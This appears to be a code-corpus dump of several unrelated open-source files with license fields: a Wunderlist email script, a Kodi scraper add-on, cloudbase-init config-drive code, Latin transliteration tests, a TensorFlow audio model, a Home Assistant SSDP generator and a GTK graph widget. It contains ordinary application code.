'redirect_uri':config['redirect_uri'],
'access_token':config['token'],
'list_id':config['list']}
tasks = requests.get("https://a.wunderlist.com/api/v1/tasks", params = task_request)
return tasks.json()
def convertDate(old_date):
year = old_date[0:4]
month = old_date[5:7]
day = old_date[8:10]
return date(int(year),int(month),int(day))
def todayDatePrint():
now = datetime.now()
return str(now.month)+'/'+str(now.day)+'/'+str(now.year)
def todayDate():
now = datetime.now()
return date(now.year, now.month, now.day)
def generateEmail(config):
list_dict = {}
text = '<html>'
# Pull List name + id from API
mylist = get_wunderlists(config)
for i in range(0,len(mylist)):
list_dict[mylist[i]['title']]=mylist[i]['id']
LateTasks = ["Late Tasks"]
TodayTasks = ["Today's Tasks"]
FutureTasks = ['Upcoming Agenda']
for each in list_dict:
list_tasks = get_tasks(list_dict[each], config)
for j in range(0,len(list_tasks)):
if 'due_date' in list_tasks[j]:
task_date = convertDate(list_tasks[j]['due_date'])
# print "Analyzing Task: ", list_tasks[j]['title'], list_tasks[j]['due_date']
if task_date < todayDate():
# print list_tasks[j]['title'], "Task Late!"
LateTasks.append([each, list_tasks[j]['title'], list_tasks[j]['due_date']])
# print "Added Late Task"
elif task_date == todayDate():
# print list_tasks[j]['title'], "Task Due Today"
TodayTasks.append([each, list_tasks[j]['title'], list_tasks[j]['due_date']])
# print "Added Today Task"
elif (task_date - todayDate()) < timedelta(3):
# print list_tasks[j]['title'], "Task in Future"
FutureTasks.append([each, list_tasks[j]['title'], list_tasks[j]['due_date']])
# print "Added Future Task"
for each in (LateTasks, TodayTasks, FutureTasks):
text+='<H2>'+each[0]+'</H2>'
# print each[0]
# print "Number of Tasks: ", len(each)
if len(each) > 1:text+='<h3>'+each[1][0]+'</h3>'
for i in range(1,len(each)):
if i > 1:
if each[i][0] == each[i-1][0]:
text+='<li>'+each[i][1]+'</li>'
else:
text+='<h3>'+each[i][0]+'</h3>'
text+='<li>'+each[i][1]+'</li>'
else:
text+='<li>'+each[i][1]+'</li>'
text+='</HTML>'
text_file = open('TEST_EMAIL.html', 'w')
text_file.write(text)
text_file.close()
return text
##Run the program for each config file
for each in ['config.json','sneha_config.json']:
config_data = parse_auth_obj(each)
email_result = generateEmail(config_data)
sendEmail(config_data, email_result) | mit | -7,650,789,133,617,430,000 | 31.208955 | 91 | 0.644496 | false |
alfa-jor/addon | plugin.video.alfa/channels/sxyprn.py | 1 | 6787 | # -*- coding: utf-8 -*-
#------------------------------------------------------------
import urlparse,re
from platformcode import config, logger
from core import scrapertools
from core.item import Item
from core import servertools
from core import httptools
host = 'https://www.sxyprn.com'
def mainlist(item):
logger.info()
itemlist = []
itemlist.append( Item(channel=item.channel, title="Nuevos" , action="lista", url=host + "/blog/all/0.html?fl=all&sm=latest"))
itemlist.append( Item(channel=item.channel, title="Mas vistos" , action="lista", url=host + "/popular/top-viewed.html"))
itemlist.append( Item(channel=item.channel, title="Mejor valorada" , action="lista", url=host + "/popular/top-rated.html"))
itemlist.append( Item(channel=item.channel, title="Sitios" , action="categorias", url=host))
itemlist.append( Item(channel=item.channel, title="Categorias" , action="categorias", url=host))
itemlist.append( Item(channel=item.channel, title="Buscar", action="search"))
return itemlist
def search(item, texto):
logger.info()
texto = texto.replace(" ", "-")
item.url = host + "/%s.html" % texto
try:
return lista(item)
except:
import sys
for line in sys.exc_info():
logger.error("%s" % line)
return []
def categorias(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t| |<br>|<br/>", "", data)
if "Sitios" in item.title:
patron = "<a href='([^']+)' target='_blank'><div class='top_sub_el top_sub_el_sc'>.*?"
patron += "<span class='top_sub_el_key_sc'>([^<]+)</span>"
patron += "<span class='top_sub_el_count'>(\d+)</span>"
else:
patron = "<a class='tdn' href='([^']+)'.*?"
patron += "<span class='htag_el_tag'>([^<]+)</span>"
patron += "<span class='htag_el_count'>(\d+) videos</span>"
matches = re.compile(patron,re.DOTALL).findall(data)
for scrapedurl,scrapedtitle,cantidad in matches:
scrapedplot = ""
scrapedthumbnail = ""
scrapedurl = urlparse.urljoin(item.url,scrapedurl)
title = scrapedtitle + " (" + cantidad + ")"
itemlist.append( Item(channel=item.channel, action="lista", title=title, url=scrapedurl,
thumbnail=scrapedthumbnail , plot=scrapedplot) )
return itemlist
def lista(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t| |<br>|<br/>", "", data)
patron = "<img class=.*?"
patron += " src='([^']+)'.*?"
patron += "<span class='duration_small'.*?'>([^<]+)<.*?"
patron += "<span class='shd_small'.*?>([^<]+)<.*?"
patron += "post_time' href='([^']+)' title='([^']+)'"
matches = re.compile(patron,re.DOTALL).findall(data)
for scrapedthumbnail,scrapedtime,quality,scrapedurl,scrapedtitle in matches:
title = "[COLOR yellow]%s[/COLOR] [COLOR red]%s[/COLOR] %s" % (scrapedtime,quality,scrapedtitle)
thumbnail = "https:" + scrapedthumbnail
scrapedurl = urlparse.urljoin(item.url,scrapedurl)
plot = ""
itemlist.append( Item(channel=item.channel, action="play", title=title, url=scrapedurl,
thumbnail=thumbnail, fanart=thumbnail, plot=plot, contentTitle = scrapedtitle))
#
next_page = scrapertools.find_single_match(data, "<div class='ctrl_el ctrl_sel'>.*?<a href='([^']+)'")
if next_page:
next_page = urlparse.urljoin(item.url,next_page)
itemlist.append( Item(channel=item.channel, action="lista", title="Página Siguiente >>", text_color="blue",
url=next_page) )
return itemlist
130
https://www.sxyprn.com/cdn8/c9/e1y9b3mzc1o101lzg5q2cze1j390h/kK-CN4l73_EeBhkoYNYA2A/1568228307/65xbtac5i3dbd568c4r9z4575at/g5fd37a74djew1zev21dm176g86.vid
data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/e1y9b3mzc1o101lzg5q2cze1j390h\/kK-CN4l73_EeBhkoYNYA2A\/1568228437\/65xbtac5i3dbd568c4r9z4575at\/g5fd37a74djew1zev21dm176g86.vid
-114
data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/m1v963ez51m1u11za5u2xz41e3806\/BQFIcJlTMr0-Z1gVUTxgaQ\/1568228604\/je54bwaz5r3xbn5a864k91487sa\/o5sd17r7xdaea1be32xd41b6b8z.vid
https://www.sxyprn.com/cdn8/c9/m1v963ez51m1u11za5u2xz41e3806/BQFIcJlTMr0-Z1gVUTxgaQ/1568228490/je54bwaz5r3xbn5a864k91487sa/o5sd17r7xdaea1be32xd41b6b8z.vid
-137
data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/5v1n993kzs1n1f1ozc5b20zg1o350\/NCnvDdBfOQmJOivEflNSww\/1568229437\/05pbja75c39br5m8q41974z7haf\/v85edl7b76diej12eb2wd7136v8.vid
https://www.sxyprn.com/cdn8/c9/5v1n993kzs1n1f1ozc5b20zg1o350/NCnvDdBfOQmJOivEflNSww/1568229300/05pbja75c39br5m8q41974z7haf/v85edl7b76diej12eb2wd7136v8.vid
-106
data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/41v9b3nzc1q1615zr5n2szw153905\/9LeO2lux-GrgOaEPfMONcA\/1568230473\/1d52b3aa5s36bt5d8o4a9m427pa\/zh5sdc7k7ndee11qe42sdz1h6j8.vid
https://www.sxyprn.com/cdn8/c9/41v9b3nzc1q1615zr5n2szw153905/9LeO2lux-GrgOaEPfMONcA/1568230367/1d52b3aa5s36bt5d8o4a9m427pa/zh5sdc7k7ndee11qe42sdz1h6j8.vid
https://c9.trafficdeposit.com/vidi/m1v963ez51m1u11za5u2xz41e3806/BQFIcJlTMr0-Z1gVUTxgaQ/1568228490/5ba53b584947a/5d77de1e2d168.vid
https://c9.trafficdeposit.com/vidi/e1y9b3mzc1o101lzg5q2cze1j390h/kK-CN4l73_EeBhkoYNYA2A/1568228307/5ba53b584947a/5d77de1e2d168.vid
+ + + + + + + + + + +
193111152130
+ + + + + + + + + + +
https://c9.trafficdeposit.com/vidi/5v1n993kzs1n1f1ozc5b20zg1o350/NCnvDdBfOQmJOivEflNSww/1568229300/5ba53b584947a/5d77de1e2d168.vid
https://c9.trafficdeposit.com/vidi/m1v963ez51m1u11za5u2xz41e3806/NCnvDdBfOQmJOivEflNSww/1568229300/5ba53b584947a/5d77de1e2d168.vid
def play(item):
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|amp;|\s{2}| ", "", data)
url = scrapertools.find_single_match(data, 'data-vnfo=.*?":"([^"]+)"')
url = url.replace("\/", "/").replace("/cdn/", "/cdn8/")
url = urlparse.urljoin(item.url,url)
itemlist = servertools.find_video_items(item.clone(url = url, contentTitle = item.title))
# itemlist.append( Item(channel=item.channel, action="play",server=directo, title = item.title, url=url))
return itemlist
| gpl-3.0 | 4,249,873,821,578,241,500 | 55.082645 | 167 | 0.620395 | false |
cmin764/cloudbase-init | cloudbaseinit/metadata/services/osconfigdrive/windows.py | 1 | 8485 | # Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import os
import shutil
import struct
import tempfile
import uuid
from oslo_config import cfg
from oslo_log import log as oslo_logging
from cloudbaseinit import exception
from cloudbaseinit.metadata.services.osconfigdrive import base
from cloudbaseinit.osutils import factory as osutils_factory
from cloudbaseinit.utils.windows import disk
from cloudbaseinit.utils.windows import vfat
opts = [
cfg.StrOpt('bsdtar_path', default='bsdtar.exe',
help='Path to "bsdtar", used to extract ISO ConfigDrive '
'files'),
]
CONF = cfg.CONF
CONF.register_opts(opts)
LOG = oslo_logging.getLogger(__name__)
CONFIG_DRIVE_LABEL = 'config-2'
MAX_SECTOR_SIZE = 4096
# Absolute offset values and the ISO magic string.
OFFSET_BOOT_RECORD = 0x8000
OFFSET_ISO_ID = OFFSET_BOOT_RECORD + 1
ISO_ID = b'CD001'
# Little-endian unsigned short size values.
OFFSET_VOLUME_SIZE = OFFSET_BOOT_RECORD + 80
OFFSET_BLOCK_SIZE = OFFSET_BOOT_RECORD + 128
PEEK_SIZE = 2
class WindowsConfigDriveManager(base.BaseConfigDriveManager):
def __init__(self):
super(WindowsConfigDriveManager, self).__init__()
self._osutils = osutils_factory.get_os_utils()
def _check_for_config_drive(self, drive):
label = self._osutils.get_volume_label(drive)
if label and label.lower() == CONFIG_DRIVE_LABEL and \
os.path.exists(os.path.join(drive,
'openstack\\latest\\'
'meta_data.json')):
LOG.info('Config Drive found on %s', drive)
return True
return False
def _get_iso_file_size(self, device):
if not device.fixed:
return None
if not device.size > (OFFSET_BLOCK_SIZE + PEEK_SIZE):
return None
off = device.seek(OFFSET_ISO_ID)
magic = device.read(len(ISO_ID), skip=OFFSET_ISO_ID - off)
if ISO_ID != magic:
return None
off = device.seek(OFFSET_VOLUME_SIZE)
volume_size_bytes = device.read(PEEK_SIZE,
skip=OFFSET_VOLUME_SIZE - off)
off = device.seek(OFFSET_BLOCK_SIZE)
block_size_bytes = device.read(PEEK_SIZE,
skip=OFFSET_BLOCK_SIZE - off)
volume_size = struct.unpack("<H", volume_size_bytes)[0]
block_size = struct.unpack("<H", block_size_bytes)[0]
return volume_size * block_size
def _write_iso_file(self, device, iso_file_path, iso_file_size):
with open(iso_file_path, 'wb') as stream:
offset = 0
# Read multiples of the sector size bytes
# until the entire ISO content is written.
while offset < iso_file_size:
real_offset = device.seek(offset)
bytes_to_read = min(MAX_SECTOR_SIZE, iso_file_size - offset)
data = device.read(bytes_to_read, skip=offset - real_offset)
stream.write(data)
offset += bytes_to_read
def _extract_files_from_iso(self, iso_file_path):
args = [CONF.bsdtar_path, '-xf', iso_file_path,
'-C', self.target_path]
(out, err, exit_code) = self._osutils.execute_process(args, False)
if exit_code:
raise exception.CloudbaseInitException(
'Failed to execute "bsdtar" from path "%(bsdtar_path)s" with '
'exit code: %(exit_code)s\n%(out)s\n%(err)s' % {
'bsdtar_path': CONF.bsdtar_path,
'exit_code': exit_code,
'out': out, 'err': err})
def _extract_iso_from_devices(self, devices):
"""Search across multiple devices for a raw ISO."""
extracted = False
iso_file_path = os.path.join(tempfile.gettempdir(),
str(uuid.uuid4()) + '.iso')
for device in devices:
try:
with device:
iso_file_size = self._get_iso_file_size(device)
if iso_file_size:
LOG.info('ISO9660 disk found on %s', device)
self._write_iso_file(device, iso_file_path,
iso_file_size)
self._extract_files_from_iso(iso_file_path)
extracted = True
break
except Exception as exc:
LOG.warning('ISO extraction failed on %(device)s with '
'%(error)r', {"device": device, "error": exc})
if os.path.isfile(iso_file_path):
os.remove(iso_file_path)
return extracted
def _get_config_drive_from_cdrom_drive(self):
for drive_letter in self._osutils.get_cdrom_drives():
if self._check_for_config_drive(drive_letter):
os.rmdir(self.target_path)
shutil.copytree(drive_letter, self.target_path)
return True
return False
def _get_config_drive_from_raw_hdd(self):
disks = map(disk.Disk, self._osutils.get_physical_disks())
return self._extract_iso_from_devices(disks)
def _get_config_drive_from_vfat(self):
for drive_path in self._osutils.get_physical_disks():
if vfat.is_vfat_drive(self._osutils, drive_path):
LOG.info('Config Drive found on disk %r', drive_path)
vfat.copy_from_vfat_drive(self._osutils, drive_path,
self.target_path)
return True
return False
def _get_config_drive_from_partition(self):
for disk_path in self._osutils.get_physical_disks():
physical_drive = disk.Disk(disk_path)
with physical_drive:
partitions = physical_drive.partitions()
extracted = self._extract_iso_from_devices(partitions)
if extracted:
return True
return False
def _get_config_drive_from_volume(self):
"""Look through all the volumes for config drive."""
volumes = self._osutils.get_volumes()
for volume in volumes:
if self._check_for_config_drive(volume):
os.rmdir(self.target_path)
shutil.copytree(volume, self.target_path)
return True
return False
def _get_config_drive_files(self, cd_type, cd_location):
get_config_drive = self.config_drive_type_location.get(
"{}_{}".format(cd_location, cd_type))
if get_config_drive:
return get_config_drive()
else:
LOG.debug("Irrelevant type %(type)s in %(location)s location; "
"skip",
{"type": cd_type, "location": cd_location})
return False
def get_config_drive_files(self, searched_types=None,
searched_locations=None):
searched_types = searched_types or []
searched_locations = searched_locations or []
for cd_type, cd_location in itertools.product(searched_types,
searched_locations):
LOG.debug('Looking for Config Drive %(type)s in %(location)s',
{"type": cd_type, "location": cd_location})
if self._get_config_drive_files(cd_type, cd_location):
return True
return False
@property
def config_drive_type_location(self):
return {
"cdrom_iso": self._get_config_drive_from_cdrom_drive,
"hdd_iso": self._get_config_drive_from_raw_hdd,
"hdd_vfat": self._get_config_drive_from_vfat,
"partition_iso": self._get_config_drive_from_partition,
"partition_vfat": self._get_config_drive_from_volume,
}
| apache-2.0 | -5,127,092,252,806,962,000 | 37.568182 | 78 | 0.576429 | false |
Jinwithyoo/han | tests/lat.py | 1 | 10678 | # -*- coding: utf-8 -*-
from tests import HangulizeTestCase
from hangulize.langs.lat import Latin
class LatinTestCase(HangulizeTestCase):
lang = Latin()
def test_people_roman(self):
self.assert_examples({
'Flavius Aëtius': '플라비우스 아에티우스',
'FLAVIVS AËTIVS': '플라비우스 아에티우스',
'Gnaeus Julius Agricola': '그나이우스 율리우스 아그리콜라',
'GNAEUS IVLIVS AGRICOLA': '그나이우스 율리우스 아그리콜라',
'Marcus Vipsanius Agrippa': '마르쿠스 빕사니우스 아그리파',
'MARCVS VIPSANIVS AGRIPPA': '마르쿠스 빕사니우스 아그리파',
'Julia Augusta Agrippina': '율리아 아우구스타 아그리피나',
'IVLIA AVGVSTA AGRIPPINA': '율리아 아우구스타 아그리피나',
'Marcus Antonius': '마르쿠스 안토니우스',
'MARCVS ANTONIVS': '마르쿠스 안토니우스',
'Apuleius': '아풀레이우스',
'APVLEIVS': '아풀레이우스',
'Gaius Julius Caesar Augustus': \
'가이우스 율리우스 카이사르 아우구스투스',
'GAIVS IVLIVS CAESAR AVGVSTVS': \
'가이우스 율리우스 카이사르 아우구스투스',
'Gaius Julius Caesar': '가이우스 율리우스 카이사르',
'GAIVS IVLIVS CAESAR': '가이우스 율리우스 카이사르',
'Gaius Valerius Catullus': '가이우스 발레리우스 카툴루스',
'GAIVS VALERIVS CATVLLVS': '가이우스 발레리우스 카툴루스',
'Marcus Tullius Cicero': '마르쿠스 툴리우스 키케로',
'MARCVS TVLLIVS CICERO': '마르쿠스 툴리우스 키케로',
'Tiberius Claudius Caesar Augustus Germanicus': \
'티베리우스 클라우디우스 카이사르 아우구스투스 게르마니쿠스',
'TIBERIVS CLAVDIVS CAESAR AVGVSTVS GERMANICVS': \
'티베리우스 클라우디우스 카이사르 아우구스투스 게르마니쿠스',
'Lucius Aurelius Commodus Antoninus': \
'루키우스 아우렐리우스 콤모두스 안토니누스',
'LVCIVS AVRELIVS COMMODVS ANTONINVS': \
'루키우스 아우렐리우스 콤모두스 안토니누스',
'Flavius Valerius Aurelius Constantinus': \
'플라비우스 발레리우스 아우렐리우스 콘스탄티누스',
'FLAVIVS VALERIVS AVRELIVS CONSTANTINVS': \
'플라비우스 발레리우스 아우렐리우스 콘스탄티누스',
'Cornelia Scipionis Africana': \
'코르넬리아 스키피오니스 아프리카나',
'CORNELIA SCIPIONIS AFRICANA': \
'코르넬리아 스키피오니스 아프리카나',
'Marcus Licinius Crassus': '마르쿠스 리키니우스 크라수스',
'MARCVS LICINIVS CRASSVS': '마르쿠스 리키니우스 크라수스',
'Gaius Aurelius Valerius Diocletianus': \
'가이우스 아우렐리우스 발레리우스 디오클레티아누스',
'GAIVS AVRELIVS VALERIVS DIOCLETIANVS': \
'가이우스 아우렐리우스 발레리우스 디오클레티아누스',
'Publius Aelius Hadrianus': '푸블리우스 아일리우스 하드리아누스',
'PVBLIVS AELIVS HADRIANVS': '푸블리우스 아일리우스 하드리아누스',
'Quintus Horatius Flaccus': '퀸투스 호라티우스 플라쿠스',
'QVINTVS HORATIVS FLACCVS': '퀸투스 호라티우스 플라쿠스',
'Flavius Petrus Sabbatius Justinianus': \
'플라비우스 페트루스 사바티우스 유스티니아누스',
'FLAVIVS PETRVS SABBATIVS IVSTINIANVS': \
'플라비우스 페트루스 사바티우스 유스티니아누스',
'Titus Livius': '티투스 리비우스',
'TITVS LIVIVS': '티투스 리비우스',
'Gaius Marius': '가이우스 마리우스',
'GAIVS MARIVS': '가이우스 마리우스',
'Nero Claudius Caesar Augustus Germanicus': \
'네로 클라우디우스 카이사르 아우구스투스 게르마니쿠스',
'NERO CLAVDIVS CAESAR AVGVSTVS GERMANICVS': \
'네로 클라우디우스 카이사르 아우구스투스 게르마니쿠스',
'Gaius Octavius': '가이우스 옥타비우스',
'GAIVS OCTAVIVS': '가이우스 옥타비우스',
'Titus Maccius Plautus': '티투스 마키우스 플라우투스',
'TITVS MACCIVS PLAVTVS': '티투스 마키우스 플라우투스',
'Gaius Plinius Secundus': '가이우스 플리니우스 세쿤두스',
'GAIVS PLINIVS SECVNDVS': '가이우스 플리니우스 세쿤두스',
'Gaius Plinius Caecilius Secundus': \
'가이우스 플리니우스 카이킬리우스 세쿤두스',
'GAIVS PLINIVS CAECILIVS SECVNDVS': \
'가이우스 플리니우스 카이킬리우스 세쿤두스',
'Gnaeus Pompeius Magnus': '그나이우스 폼페이우스 마그누스',
'GNAEVS POMPEIVS MAGNVS': '그나이우스 폼페이우스 마그누스',
'Sextus Aurelius Propertius': \
'섹스투스 아우렐리우스 프로페르티우스',
'SEXTVS AVRELIVS PROPERTIVS': \
'섹스투스 아우렐리우스 프로페르티우스',
'Gaius Sallustius Crispus': '가이우스 살루스티우스 크리스푸스',
'GAIVS SALLVSTIVS CRISPVS': '가이우스 살루스티우스 크리스푸스',
'Lucius Annaeus Seneca': '루키우스 안나이우스 세네카',
'LVCIVS ANNAEUS SENECA': '루키우스 안나이우스 세네카',
'Spartacus': '스파르타쿠스',
'SPARTACVS': '스파르타쿠스',
'Gaius Suetonius Tranquillus': '가이우스 수에토니우스 트랑퀼루스',
'GAIVS SVETONIVS TRANQVILLVS': '가이우스 수에토니우스 트랑퀼루스',
'Lucius Cornelius Sulla Felix': \
'루키우스 코르넬리우스 술라 펠릭스',
'LVCIVS CORNELIVS SVLLA FELIX': \
'루키우스 코르넬리우스 술라 펠릭스',
'Publius Cornelius Tacitus': '푸블리우스 코르넬리우스 타키투스',
'PVBLIVS CORNELIVS TACITVS': '푸블리우스 코르넬리우스 타키투스',
'Marcus Ulpius Nerva Trajanus': \
'마르쿠스 울피우스 네르바 트라야누스',
'MARCUS VLPIVS NERVA TRAIANVS': \
'마르쿠스 울피우스 네르바 트라야누스',
'Publius Vergilius Maro': '푸블리우스 베르길리우스 마로',
'PVBLIVS VERGILIVS MARO': '푸블리우스 베르길리우스 마로',
'Titus Flavius Vespasianus': '티투스 플라비우스 베스파시아누스',
'TITVS FLAVIVS VESPASIANVS': '티투스 플라비우스 베스파시아누스',
'Marcus Vitruvius Pollio': '마르쿠스 비트루비우스 폴리오',
'MARCVS VITRVVIVS POLLIO': '마르쿠스 비트루비우스 폴리오',
})
def test_people_nonroman(self):
self.assert_examples({
'Georgius Agricola': '게오르기우스 아그리콜라',
'Anselmus': '안셀무스',
'Averroës': '아베로에스',
'Aurelius Augustinus Hipponensis': \
'아우렐리우스 아우구스티누스 히포넨시스',
'Carolus Magnus': '카롤루스 마그누스',
'Nicolaus Copernicus': '니콜라우스 코페르니쿠스',
'Cyrus': '키루스',
'Darius': '다리우스',
'Gotarzes': '고타르제스',
'Hannibal': '한니발',
'Flavius Josephus': '플라비우스 요세푸스',
'Mithridates': '미트리다테스',
'Flavius Odoacer': '플라비우스 오도아케르',
})
def test_places(self):
self.assert_examples({
'Aegyptus': '아이깁투스',
'Asia': '아시아',
'Assyria': '아시리아',
'Britannia': '브리탄니아',
'Carthago': '카르타고',
'Cannae': '칸나이',
'Galatia': '갈라티아',
'Gallia': '갈리아',
'Germania': '게르마니아',
'Hispania': '히스파니아',
'Illyricum': '일리리쿰',
'Iudaea': '유다이아',
'Latium': '라티움',
'Lusitania': '루시타니아',
'Numidia': '누미디아',
'Padus': '파두스',
'Parthia': '파르티아',
# u'Pompeii': u'폼페이',
'Roma': '로마',
'Sicilia': '시킬리아',
'Syracusae': '시라쿠사이',
'Thracia': '트라키아',
'Mons Vesuvius': '몬스 베수비우스',
})
def test_texts(self):
self.assert_examples({
'Aeneis': '아이네이스',
'Naturalis Historia': '나투랄리스 히스토리아',
'Commentarii de Bello Gallico': '콤멘타리이 데 벨로 갈리코',
'Confessiones': '콘페시오네스',
'Metamorphoseon': '메타모르포세온',
'Philosophiæ Naturalis Principia Mathematica': \
'필로소피아이 나투랄리스 프링키피아 마테마티카',
})
def test_mythology(self):
self.assert_examples({
'Apollo': '아폴로',
'Bacchus': '바쿠스',
'Ceres': '케레스',
'Diana': '디아나',
'Ianus': '야누스',
'Iuno': '유노',
'Iupitter': '유피테르',
'Mars': '마르스',
'Mercurius': '메르쿠리우스',
'Minerva': '미네르바',
'Neptunus': '넵투누스',
'Pluto': '플루토',
'Saturnus': '사투르누스',
'Venus': '베누스',
'Vesta': '베스타',
'Vulcanus': '불카누스',
})
def test_miscellaneous(self):
self.assert_examples({
'consul': '콘술',
'Pax Romana': '팍스 로마나',
'res publica': '레스 푸블리카',
'senatus': '세나투스',
})
| bsd-3-clause | 8,601,629,544,688,862,000 | 39.020408 | 63 | 0.511346 | false |
WhatDo/FlowFairy | examples/sine_fix/gglu_nopool.py | 1 | 3674 | import tensorflow as tf
import tensorflow.contrib.slim as slim
from flowfairy.conf import settings
from util import lrelu, conv2d, maxpool2d, embedding, avgpool2d, GLU, causal_GLU
from functools import partial
import ops
discrete_class = settings.DISCRETE_CLASS
batch_size = settings.BATCH_SIZE
samplerate = sr = settings.SAMPLERATE
dropout = settings.DROPOUT
learning_rate = settings.LEARNING_RATE
embedding_size = settings.EMBEDDING_SIZE
num_classes = settings.CLASS_COUNT
def broadcast(l, emb):
sh = l.get_shape().as_list()[1]
emb = emb[:, None, None, :]
emb = tf.tile(emb, (1,sh,1,1))
return tf.concat([l, emb], 3)
# Create model
def conv_net(x, cls, dropout, is_training=False):
xs = tf.expand_dims(x, -1)
xs = tf.expand_dims(xs, -1)
conv1 = causal_GLU(xs, 4, [256, 1], scope='conv1_1', normalizer_fn=slim.batch_norm, normalizer_params={'is_training': is_training, 'decay': 0.9})
conv1 = GLU(conv1, 4, [256, 1], scope='conv1_2')
#pool1 = slim.max_pool2d(conv1, [2,1])
print('conv1: ', conv1)
#with tf.name_scope('embedding'):
with tf.variable_scope('embedding'):
emb1 = embedding(cls, embedding_size, num_classes)
embedded = broadcast(conv1, emb1)
print('embedded:', embedded)
#convblock 2
conv2 = GLU(embedded, 8, [256, 1], scope='conv2_1')
conv2 = GLU(conv2, 8, [256, 1], scope='conv2_2')
#pool2 = slim.max_pool2d(conv2, [2,1])
print('conv2: ', conv2)
#convblock 3
conv3 = GLU(conv2, 16, [256, 1], scope='conv3_1')
conv3 = GLU(conv3, 16, [256, 1], scope='conv3_2')
print('conv3: ', conv3)
#convblock 4
#conv4 = tf.depth_to_space(conv3, 4) #upconv
#print('d2sp: ', conv4)
#conv4 = tf.reshape(conv4, shape=[-1, sr, 1, 4]) # reshape upconvolution to have proper shape
conv4 = GLU(conv3, 16, [256, 1], scope='conv4_1')
conv4 = GLU(conv4, 16, [256, 1], scope='conv4_2')
print('conv4: ', conv4)
#convblock 5
conv5 = tf.concat([conv4, conv1], 3) # <- unet like concat first with last
conv5 = GLU(conv5, 16, [256, 1], scope='conv5')
conv5 = GLU(conv5, discrete_class, [2,1], scope='out')
print('conv5: ', conv5)
#out
out = tf.reshape(conv5, [-1, sr, discrete_class])
print('out: ', out)
return out
class Net:
def __init__(self):
pass
def feedforward(self, x, y, frqid, frqid2, is_training=False):
pred = conv_net(x, frqid, None, is_training)
target_output = tf.reshape(y,[-1])
prediction = tf.reshape(pred,[-1, discrete_class])
# Define loss and optimizer
cost = tf.losses.sparse_softmax_cross_entropy(logits = prediction,
labels = target_output,
scope='xentropy')
correct_pred = tf.equal(tf.argmax(pred, 2), y)
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
return pred, cost, accuracy
def train(self, **kwargs):
self.train_x = kwargs['x']
self.train_y = kwargs['y']
self.train_pred, self.train_cost, self.train_acc = self.feedforward(is_training=True, **kwargs)
self.optimizer = ops.train()
def validation(self, **kwargs):
self.val_x = kwargs['x']
self.val_y = kwargs['y']
self.val_pred, self.val_cost, self.val_acc = self.feedforward(**kwargs)
self.val_pred = tf.Print(self.val_pred, [kwargs['frqid'], kwargs['frqid2']], message='frqids: ')
def begin(self, session):
#session.run(self.init)
pass
def should_stop(self):
return False
| mit | 6,973,295,967,363,852,000 | 31.803571 | 149 | 0.605335 | false |
fbradyirl/home-assistant | script/hassfest/ssdp.py | 1 | 2564 | """Generate ssdp file."""
from collections import OrderedDict, defaultdict
import json
from typing import Dict
from .model import Integration, Config
BASE = """
\"\"\"Automatically generated by hassfest.
To update, run python3 -m script.hassfest
\"\"\"
SSDP = {}
""".strip()
def sort_dict(value):
"""Sort a dictionary."""
return OrderedDict((key, value[key]) for key in sorted(value))
def generate_and_validate(integrations: Dict[str, Integration]):
"""Validate and generate ssdp data."""
data = {
"st": defaultdict(list),
"manufacturer": defaultdict(list),
"device_type": defaultdict(list),
}
for domain in sorted(integrations):
integration = integrations[domain]
if not integration.manifest:
continue
ssdp = integration.manifest.get("ssdp")
if not ssdp:
continue
try:
with open(str(integration.path / "config_flow.py")) as fp:
content = fp.read()
if (
" async_step_ssdp" not in content
and "register_discovery_flow" not in content
):
integration.add_error("ssdp", "Config flow has no async_step_ssdp")
continue
except FileNotFoundError:
integration.add_error(
"ssdp", "SSDP info in a manifest requires a config flow to exist"
)
continue
for key in "st", "manufacturer", "device_type":
if key not in ssdp:
continue
for value in ssdp[key]:
data[key][value].append(domain)
data = sort_dict({key: sort_dict(value) for key, value in data.items()})
return BASE.format(json.dumps(data, indent=4))
def validate(integrations: Dict[str, Integration], config: Config):
"""Validate ssdp file."""
ssdp_path = config.root / "homeassistant/generated/ssdp.py"
config.cache["ssdp"] = content = generate_and_validate(integrations)
with open(str(ssdp_path), "r") as fp:
if fp.read().strip() != content:
config.add_error(
"ssdp",
"File ssdp.py is not up to date. " "Run python3 -m script.hassfest",
fixable=True,
)
return
def generate(integrations: Dict[str, Integration], config: Config):
"""Generate ssdp file."""
ssdp_path = config.root / "homeassistant/generated/ssdp.py"
with open(str(ssdp_path), "w") as fp:
fp.write(config.cache["ssdp"] + "\n")
| apache-2.0 | 1,920,420,221,825,948,000 | 28.136364 | 87 | 0.578393 | false |
inguma/bokken | ui/graph.py | 1 | 6901 | # graph.py
#
# Copyright 2011 Hugo Teso <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
from gi.repository import Gtk
from gi.repository import GObject
from PIL import Image
import os, tempfile
from subprocess import *
import ui.mydot_widget as mydot_widget
import graph_bar
class MyDotWidget(Gtk.HBox):
'''Working'''
def __init__(self, core, main):
self.uicore = core
self.main = main
self.last_fcn = ''
#dotcode = self.uicore.get_callgraph()
#GObject.GObject.__init__(self, False, 1)
# MEOW
GObject.GObject.__init__(self)
